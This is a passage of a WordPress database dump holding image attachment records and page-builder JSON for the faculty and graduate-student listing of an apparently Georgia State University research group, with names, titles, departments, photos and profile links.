12:55:53','https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-headshot-1.jpg','headshot-1.jpg','','inherit','open','closed','','headshot-1-jpg-4','','','2023-10-13 08:55:53','2023-10-13 12:55:53','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-cropped-cropped-headshot-1-e1651208089645-2-e1697201737742.jpg',0,'attachment','image/jpeg',0),(1698,1,'2023-10-13 08:57:43','2023-10-13 12:57:43','https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-Portrait-1-2.jpeg','cropped-Portrait-1-2.jpeg','','inherit','open','closed','','cropped-portrait-1-2-jpeg','','','2023-10-13 08:57:43','2023-10-13 12:57:43','',0,'https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-Portrait-1-2.jpeg',0,'attachment','image/jpeg',0),(1699,1,'2023-10-13 09:03:05','2023-10-13 13:03:05','https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-Portrait-1.jpeg','cropped-Portrait-1.jpeg','','inherit','open','closed','','cropped-portrait-1-jpeg','','','2023-10-13 09:03:54','2023-10-13 13:03:54','',0,'https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-Portrait-1.jpeg',0,'attachment','image/jpeg',0),(1701,1,'2023-10-13 09:04:48','2023-10-13 13:04:48','https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-Portrait-1.jpeg','cropped-Portrait-1.jpeg','','inherit','open','closed','','cropped-portrait-1-jpeg-2','','','2023-10-13 09:04:48','2023-10-13 13:04:48','',0,'https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-cropped-Portrait-1-e1697202215204.jpeg',0,'attachment','image/jpeg',0),(1702,1,'2023-10-13 09:06:01','2023-10-13 13:06:01','https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-sunderraman1.jpeg','cropped-sunderraman1.jpeg','','inherit','open','closed','','cropped-sunderraman1-jpeg','','','2023-10-13 09:06:01','2023-10-13 13:06:01','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-sunderraman1.jpeg',0,'attachment','image/jpeg',0),(1703,1,'2023-10-13 09:06:42','2023-10-13 13:06:42','https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-SRM-360x360-1.png','SRM-360x360','','inherit','open','closed','','srm-360x360-3','','','2023-10-13 09:07:32','2023-10-13 13:07:32','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-SRM-360x360-1.png',0,'attachment','image/png',0),(1704,1,'2023-10-13 09:07:34','2023-10-13 13:07:34','https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-SRM-360x360-1.png','SRM-360x360','','inherit','open','closed','','srm-360x360-4','','','2023-10-13 09:07:34','2023-10-13 13:07:34','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-SRM-360x360-1-e1697202435329.png',0,'attachment','image/png',0),(1706,1,'2023-10-13 09:19:36','2023-10-13 13:19:36','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Faculty\",\"attrs\":{\"id\":\"faculty\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c4\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c4\",\"index\":0,\"id\":\"182-c5\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-cropped-cropped-headshot-1-e1651208089645-2-e1697201737742.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1697,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c4\",\"index\":0,\"id\":\"182-c6\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Chetan Tiwari\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c4\",\"index\":2,\"id\":\"182-c7\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Director<\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c4\",\"index\":1,\"id\":\"182-c8\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/chetan-tiwari\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/chetan-tiwari\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=C5PVPkoAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c4\",\"index\":1,\"id\":\"182-c9\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c10\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c10\",\"index\":0,\"id\":\"182-c11\",\"partialId\":182,\"styleRef\":978,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-Portrait-1-1-e1697138676716.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1648,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c10\",\"index\":0,\"id\":\"182-c12\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Armin Mikler\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c10\",\"index\":2,\"id\":\"182-c13\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p> Chair and Professor<br><\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c10\",\"index\":1,\"id\":\"182-c14\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/armin-mikler\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/armin-mikler\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.087331887226354},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=41ckZZsAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882}]},\"parentId\":\"182-c10\",\"index\":1,\"id\":\"182-c15\",\"partialId\":182,\"styleRef\":979,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c16\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c16\",\"index\":0,\"id\":\"182-c17\",\"partialId\":182,\"styleRef\":980,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-sunderraman1-e1697143080973.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1668,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c16\",\"index\":0,\"id\":\"182-c18\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Raj Sunderraman\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c16\",\"index\":2,\"id\":\"182-c19\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Associate Chair and Professor<\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c16\",\"index\":1,\"id\":\"182-c20\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/raj-sunderraman-a5591bb2\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/raj-sunderraman\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.087331887226354},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?hl=en&user=Wlxc9FEAAAAJ\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882}]},\"parentId\":\"182-c16\",\"index\":1,\"id\":\"182-c21\",\"partialId\":182,\"styleRef\":981,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c22\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c22\",\"index\":0,\"id\":\"182-c23\",\"partialId\":182,\"styleRef\":982,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-SRM-360x360-1-e1697143162762.png\",\"caption\":{\"text\":\"\"},\"imageId\":1670,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c22\",\"index\":0,\"id\":\"182-c24\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Susie Ramisetty-Mikler\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c22\",\"index\":2,\"id\":\"182-c25\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Research Associate Professor<\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c22\",\"index\":1,\"id\":\"182-c26\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Population Health Sciences<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/susie-ramisetty-mikler-7a0b3014\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/publichealth.gsu.edu\\/profile\\/susie-ramisetty-mikler\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=KzNVJwIAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.087331887226354}]},\"parentId\":\"182-c22\",\"index\":1,\"id\":\"182-c27\",\"partialId\":182,\"styleRef\":983,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c28\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c28\",\"index\":0,\"id\":\"182-c29\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-zelikovsky-e1697143252884-1.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1673,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c28\",\"index\":0,\"id\":\"182-c30\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Alex Zelikovsky\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c28\",\"index\":2,\"id\":\"182-c31\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Distinguished University Professor<\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c28\",\"index\":1,\"id\":\"182-c32\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/alex-zelikovsky-48a2795\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/alex-zelikovsky\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=UzCRNJwAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c28\",\"index\":1,\"id\":\"182-c33\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c34\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c34\",\"index\":0,\"id\":\"182-c35\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-bourgeois-e1697143389924.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1675,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c34\",\"index\":0,\"id\":\"182-c36\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Anu Bourgeois\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c34\",\"index\":2,\"id\":\"182-c37\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Professor<\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c34\",\"index\":1,\"id\":\"182-c38\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/anu-bourgeois-09b7b32b\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/anu-bourgeois\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=qsAUgQ8AAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c34\",\"index\":1,\"id\":\"182-c39\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c40\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c40\",\"index\":0,\"id\":\"182-c41\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/08\\/cropped-cropped-hu_new-1-e1697143455517.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1677,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c40\",\"index\":0,\"id\":\"182-c42\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Xiaolin Hu\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c40\",\"index\":2,\"id\":\"182-c43\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Professor<\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c40\",\"index\":1,\"id\":\"182-c44\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/csds.gsu.edu\\/profile\\/xiaolin-hu\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=zeU19nAAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c40\",\"index\":1,\"id\":\"182-c45\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c46\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c46\",\"index\":0,\"id\":\"182-c47\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-cropped-cropped-patterson-e1697143515399.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1679,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c46\",\"index\":0,\"id\":\"182-c48\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Murray Patterson\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c46\",\"index\":2,\"id\":\"182-c49\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Assistant Professor&nbsp;<\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c46\",\"index\":1,\"id\":\"182-c50\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/murray-patterson-449a947\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/murray-patterson\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=X4J8vAEAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c46\",\"index\":1,\"id\":\"182-c51\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c52\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c52\",\"index\":0,\"id\":\"182-c53\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-Taylor-shelton_300x300-e1697143561739.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1681,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c52\",\"index\":0,\"id\":\"182-c54\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Taylor Shelton\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c52\",\"index\":2,\"id\":\"182-c55\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\\\">Assistant Professor<\\/span><\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c52\",\"index\":1,\"id\":\"182-c56\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/taylor-shelton-28a4b3291\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/taylor-shelton\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=WFA1Ry8AAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c52\",\"index\":1,\"id\":\"182-c57\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c58\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c58\",\"index\":0,\"id\":\"182-c59\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/10\\/cropped-cropped-Hassan-Babaie-300x300-1-e1697143646400.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1682,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c58\",\"index\":0,\"id\":\"182-c60\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Hassan Babaie\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c58\",\"index\":2,\"id\":\"182-c61\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Associate Professor<br><\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c58\",\"index\":1,\"id\":\"182-c62\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/geosciences.gsu.edu\\/profile\\/hassan-babaie\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.researchgate.net\\/profile\\/Hassan-Babaie\\/4\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c58\",\"index\":1,\"id\":\"182-c63\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"}],\"id\":\"182-c3\",\"parentId\":\"182-c2\",\"partialId\":182,\"styleRef\":971,\"type\":\"content\"}],\"id\":\"182-c2\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Faculty\"},\"id\":\"182-c66\",\"parentId\":\"182-c65\",\"partialId\":182,\"styleRef\":986,\"type\":\"content\"}],\"id\":\"182-c65\",\"parentId\":\"182-c64\",\"partialId\":182,\"styleRef\":985,\"type\":\"content\"}],\"id\":\"182-c64\",\"parentId\":\"182-c2\",\"partialId\":182,\"styleRef\":984,\"type\":\"content\"}]},\"styleRef\":970,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Grads\",\"attrs\":{\"id\":\"grads\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c69\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c69\",\"index\":0,\"id\":\"182-c70\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/10\\/cropped-282038166_2492815234187345_4129762528023780269_n-e1697142834100.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1659,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c69\",\"index\":0,\"id\":\"182-c71\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Sundos Al Subhi<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c69\",\"index\":2,\"id\":\"182-c72\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Candidate<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c69\",\"index\":3,\"id\":\"182-c73\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/sundos-al-subhi-88bb97150\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c69\",\"index\":1,\"id\":\"182-c74\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c75\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c75\",\"index\":0,\"id\":\"182-c76\",\"partialId\":182,\"styleRef\":849,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/06\\/cropped-IMG_1240-scaled-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1336,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c75\",\"index\":0,\"id\":\"182-c77\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Aaja Christie<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c75\",\"index\":2,\"id\":\"182-c78\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Candidate<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c75\",\"index\":3,\"id\":\"182-c79\",\"partialId\":182,\"styleRef\":901,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer 